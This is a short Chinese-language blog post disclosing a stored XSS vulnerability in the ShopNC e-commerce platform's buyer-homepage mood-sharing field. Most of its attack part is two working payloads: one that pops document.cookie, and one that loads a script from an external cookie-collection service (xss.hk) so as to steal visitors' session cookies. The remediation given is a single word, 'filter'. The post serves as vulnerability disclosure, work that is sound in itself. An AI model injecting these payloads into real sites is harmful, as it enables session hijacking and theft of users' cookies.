shopnc最新版存储型xss – 网站安全 – 自学php

时间: 2020-10-10|tag: 30次围观|0 条评论

shopnc版本测试http://www.shopnctest.com/c2c/2013/demo/   shopnc用户个人主页处存在存储型XSS,可以获取用户敏感cookie信息。   在买家首页,分享心情处 shopnc最新版存储型xss – 网站安全 – 自学php插图   测试代码为:"><img src=2 onerror=alert(11)/><scriPt >alert(document.cookie)</scripT>//   cookie收信平台   "><img src=2 onerror=alert(11)/><scriPt src=http://xss.hk/ytcXRW?1396447777>alert(document.cookie)</scripT>/   如图  
shopnc最新版存储型xss – 网站安全 – 自学php插图1 修复方案: 过滤
    上一篇: 从Fuzzing到0day - 网站安全 - 自学php

    下一篇: 酷源cms 1.0 地下0day(任意上传) - 网站安全 - 自学
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《shopnc最新版存储型xss – 网站安全 – 自学php
   

还没有人抢沙发呢~